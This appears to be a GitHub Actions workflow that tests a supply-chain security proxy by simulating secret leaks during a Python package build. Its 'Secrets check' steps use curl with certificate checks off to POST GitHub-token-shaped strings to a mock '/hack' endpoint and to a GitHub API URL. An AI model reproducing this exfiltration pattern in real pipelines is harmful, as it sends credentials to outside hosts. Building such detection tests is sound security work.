name: Build Python Package with short workflow and secrets
on:
  push:
    branches: [ Short-workflow ]
  pull_request:
    branches: [ Short-workflow ]

permissions:
  checks: write
  contents: read
  packages: read

jobs:
  start_proxy_and_build:
    runs-on: ubuntu-latest
    container:
      image: python:3.12-slim
      options: --cap-add=NET_ADMIN
    steps:
    
    - name: Install curl
      run: |
          apt update
          apt install curl
          
    - uses: ir-ashraya-tuladhar/pse-action@v0.0.24
      with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
          VB_API_URL: 'https://app.stage.invisirisk.com'
          VB_API_Key: '${{secrets.VB_API_KEY_STAGE}}'
          
    - name: Checkout the code
      uses: actions/checkout@v3
      
    
    - name: (Secrets check 1) Send POST request with GitHub token
      run: |
          curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
            -H "Content-Type: application/json" \
            -d '{
            "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
          }'
    - name: (Secrets check 2) Make API Request
      run: |
        curl -k -X POST https://api.github.com/endpoint \
        -d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}'
        
    - name: install dependencies
      run: pip install --ignore-installed -r requirements.txt || true
    # - run: npm ci
    # - run: npm run build --if-present
    # - run: npm test
